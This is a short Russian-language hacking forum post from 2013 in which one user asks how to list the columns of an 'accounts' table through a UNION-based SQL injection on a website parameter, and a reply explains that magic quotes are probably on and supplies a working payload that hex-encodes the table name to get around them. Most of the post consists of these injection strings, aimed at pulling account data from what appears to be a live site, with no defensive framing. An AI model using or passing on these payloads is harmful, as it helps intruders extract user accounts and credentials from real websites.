24.04.2013, 12:31
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от LomasterII
есть инъекция
так работает нормально
?menu=95&add=50110339+and+1=0+union+select+1,table _name,3,4,5,6,7,8+from+information_schema.tables+--+
названия таблиц выводятся в столбик, есть таблица accounts,но я не могу вывести названия столбцов. Вывод ошибки тут отсутствует
пробовал так:
?menu=95&add=50110339+and+1=0+union+select+1,colum n_name,3,4,5,6,7,8+from+information_schema.columns +where+table_name='accounts'+--+
не выходит
а так выводится огромное кол-во столбцов:
?menu=95&add=50110339+and+1=0+union+select+1,colum n_name,3,4,5,6,7,8+from+information_schema.columns +--+
как мне вывести именно accounts?
пробовал в hex переводить, кавычки ставить/убирать, не получается
Скорее всего у вас MQ включены.
Следовательно, надо использовать запросы вида
menu=95&add=50110339+and+1=0+union+select+1,column _name,3,4,5,6,7,8+from+information_schema.columns+ where+table_name=0x6163636f756e7473+--+
|
|
|